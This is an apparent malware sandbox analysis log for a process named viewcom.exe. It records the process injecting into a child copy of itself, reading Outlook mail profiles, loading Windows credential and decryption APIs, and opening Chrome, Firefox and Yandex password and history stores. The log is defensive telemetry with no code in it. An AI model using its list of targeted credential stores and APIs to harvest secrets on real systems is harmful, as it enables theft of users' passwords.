Open Key	HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail		1	Fn
Read Value	HKEY_CURRENT_USER\Identities\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}	value_name = Username, data = Main Identity, type = REG_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	value_name = POP3 User, data = 208, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	value_name = IMAP User, data = 208, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	value_name = HTTP User, data = 208, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	value_name = SMTP User, data = 208, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = POP3 User, data = dkjvzh@jjjd.com, type = REG_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = POP3 Server, data = ffadv, type = REG_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = Display Name, data = djvohe, type = REG_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = Email, data = dkjvzh@jjjd.com, type = REG_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = SMTP Server, data = ddvs, type = REG_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = SMTP Port, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = POP3 Port, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = POP3 Use SPA, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = POP3 Password, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = IMAP User, data = 100, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = HTTP User, data = 100, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	value_name = SMTP User, data = 100, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	value_name = POP3 User, data = 100, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	value_name = IMAP User, data = 100, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	value_name = HTTP User, data = 100, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	value_name = SMTP User, data = 100, type = REG_NONE	1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Identities		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Identities		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\21c3340121c69b4d9839e87233c43775		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5820efc9fdbb5f47849ddf6d61a8efbf		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5822179f3ba9dd4b834ca5b688df58ee		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5cf6dc56389a514da4af66e8d249d682		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\79245ba6aebb494e8474990b23b0b5d9		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\822186790bcca847a772607001697335		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b76d3b10d1949342bbbb36b682c4ceca		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook		1	Fn
Enumerate Keys	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles		1	Fn

Module (32)

Operation	Module	Additional Information	Count	Logfile
Load	comctl32.dll	base_address = 0x723c0000	1	Fn
Load	shell32.dll	base_address = 0x764f0000	1	Fn
Load	pstorec.dll	base_address = 0x72810000	1	Fn
Load	crypt32.dll	base_address = 0x757b0000	2	Fn
Load	advapi32.dll	base_address = 0x76030000	3	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	2	Fn
Get Filename		process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitCommonControlsEx, address_out = 0x723c6be6	1	Fn
Get Address	c:\windows\system32\shell32.dll	function = SHGetSpecialFolderPathA, address_out = 0x7673fb26	1	Fn
Get Address	c:\windows\system32\pstorec.dll	function = PStoreCreateInstance, address_out = 0x7281526c	1	Fn
Get Address	c:\windows\system32\crypt32.dll	function = CryptUnprotectData, address_out = 0x757e5a7f	2	Fn
Get Address	c:\windows\system32\advapi32.dll	function = CredReadA, address_out = 0x760771c1	3	Fn
Get Address	c:\windows\system32\advapi32.dll	function = CredFree, address_out = 0x7603b2ec	3	Fn
Get Address	c:\windows\system32\advapi32.dll	function = CredDeleteA, address_out = 0x76077941	3	Fn
Get Address	c:\windows\system32\advapi32.dll	function = CredEnumerateA, address_out = 0x76077381	3	Fn
Get Address	c:\windows\system32\advapi32.dll	function = CredEnumerateW, address_out = 0x76077481	3	Fn

System (2)

Operation	Additional Information	Success	Count	Logfile
Get Computer Name	result_out = ZJEWV7F		1	Fn
Get Info	type = Operating System		1	Fn

Ini (7)

Operation	Filename	Additional Information	Count	Logfile
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = ShowGridLines, default_value = 0	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = SaveFilterIndex, default_value = 0	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = AddExportHeaderLine, default_value = 0	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = MarkOddEvenRows, default_value = 0	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = WinPos	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = Columns	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = Sort, default_value = 0	1	Fn

Process #9: viewcom.exe

(Host: 1048, Network: 0)

Information	Value
ID	#9
File Name	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe
Command Line	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp"
Initial Working Directory	C:\Users\ATVeyDl98Z\Desktop\
Monitor	Start Time: 00:01:18, Reason: Child Process
Unmonitor	End Time: 00:02:34, Reason: Terminated by Timeout
Monitor Duration	00:01:16

OS Process Information

Information	Value
PID	0xc78
Parent PID	0xb98 (c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	ZJEWV7F\ATVeyDl98Z
Groups	ZJEWV7F\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f73d (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x C7C 0x C98

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x0012ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000130000	0x00130000	0x00133fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000140000	0x00140000	0x00140fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000150000	0x00150000	0x00150fff	Pagefile Backed Memory	Readable, Writable	Region Actions
tzres.dll	0x00160000	0x00160fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000160000	0x00160000	0x0016ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000160000	0x00160000	0x00167fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000170000	0x00170000	0x00176fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000180000	0x00180000	0x00181fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000190000	0x00190000	0x0028ffff	Private Memory	Readable, Writable	Region Actions Download Dump
locale.nls	0x00290000	0x002f6fff	Memory Mapped File	Readable	Region Actions
rsaenh.dll	0x00300000	0x0033bfff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000300000	0x00300000	0x00307fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000350000	0x00350000	0x0035ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000390000	0x00390000	0x0039ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000400000	0x00400000	0x0045afff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x0000000000460000	0x00460000	0x00527fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000530000	0x00530000	0x00630fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000640000	0x00640000	0x0123ffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001240000	0x01240000	0x0133ffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x01340000	0x0160efff	Memory Mapped File	Readable	Region Actions
private_0x0000000001610000	0x01610000	0x0170ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001710000	0x01710000	0x01810fff	Private Memory	Readable, Writable	Region Actions Download Dump
nss3.dll	0x01710000	0x018c1fff	Memory Mapped File	Readable	Region Actions
nss3.dll	0x01710000	0x018c1fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001710000	0x01710000	0x017dffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000017e0000	0x017e0000	0x018cffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000018d0000	0x018d0000	0x019cffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000019d0000	0x019d0000	0x01acffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001a00000	0x01a00000	0x01afffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000001b00000	0x01b00000	0x01ef2fff	Pagefile Backed Memory	Readable	Region Actions
freebl3.dll	0x5f0f0000	0x5f13efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
freebl3.dll	0x5f140000	0x5f18efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcp100.dll	0x5f190000	0x5f1f8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nss3.dll	0x5f200000	0x5f3b4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcr100.dll	0x5fa20000	0x5faddfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
softokn3.dll	0x6b220000	0x6b246fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
softokn3.dll	0x6b250000	0x6b276fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nssdbm3.dll	0x6b260000	0x6b276fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nssdbm3.dll	0x6b6c0000	0x6b6d6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winmm.dll	0x6cda0000	0x6cdd1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mozglue.dll	0x6d470000	0x6d491fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wsock32.dll	0x6f660000	0x6f666fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
vaultcli.dll	0x723a0000	0x723abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x723c0000	0x72443fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pstorec.dll	0x72810000	0x7281cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x741e0000	0x741f3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x74c60000	0x74c68fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74f80000	0x74fbafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x751e0000	0x751f5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x75660000	0x7566bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x75780000	0x7578bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x757b0000	0x758ccfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x758d0000	0x75919fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x75a70000	0x75b0cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75b10000	0x75b19fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x75b20000	0x75b54fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75b60000	0x75c00fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75c10000	0x75cd8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x75ce0000	0x75e15fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x75e20000	0x75e25fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x75e30000	0x7602afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x76030000	0x760cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x760d0000	0x760d4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x760e0000	0x76136fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x76330000	0x76348fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76350000	0x76423fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x764f0000	0x77139fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77140000	0x7715efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comdlg32.dll	0x77160000	0x771dafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x771e0000	0x772d4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x772e0000	0x773abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x773b0000	0x7745bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x77460000	0x775bbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x775c0000	0x776fbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x77710000	0x7775dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x77760000	0x777eefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x77800000	0x77800fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd8000	0x7ffd8000	0x7ffd8fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Injection Information

Injection Type	Source Process	Source Os Thread ID	Injection Info	Count	Logfile
Modify Memory	#6: c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	0xc58	address = 0x400000, size = 372736	1	Fn Data
Modify Memory	#6: c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	0xc58	address = 0x7ffd8008, size = 4	1	Fn Data
Modify Control Flow	#6: c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	0xc58	os_tid = 0xc7c, address = 0x0	1	Fn

Host Behavior

File (818)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070520170706\index.dat	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\Profiles\zcf30c9i.default\places.sqlite	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data	desired_access = GENERIC_READ	1	Fn
Create	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data	desired_access = GENERIC_READ	1	Fn
Create	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\ProgramData\9F1C.tmp	desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom_lng.ini	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat	type = size	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat	type = size	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat	type = size	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070520170706\index.dat	type = size	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\Profiles\zcf30c9i.default\history.dat	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\Profiles\zcf30c9i.default\places.sqlite	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\Profiles\zcf30c9i.default\places.sqlite	type = time	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\profiles.ini	type = file_attributes	1	Fn
Get Info	C:\Program Files\Mozilla Firefox\nss3.dll	type = file_attributes	3	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\Profiles\zcf30c9i.default\logins.json	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\Profiles\zcf30c9i.default\signons.sqlite	type = file_attributes	1	Fn
Get Info	C:\Program Files\Mozilla Firefox\sqlite3.dll	type = file_attributes	1	Fn
Get Info	C:\Program Files\Mozilla Firefox\mozsqlite3.dll	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini	type = file_attributes	1	Fn
Get Info	C:\Program Files\Sea Monkey\nss3.dll	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	type = file_attributes	2	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data	type = size, size_out = 0	5	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data-wal	type = file_attributes	2	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal	type = file_attributes	2	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data	type = size, size_out = 0	5	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal	type = file_attributes	2	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data	type = file_attributes	1	Fn
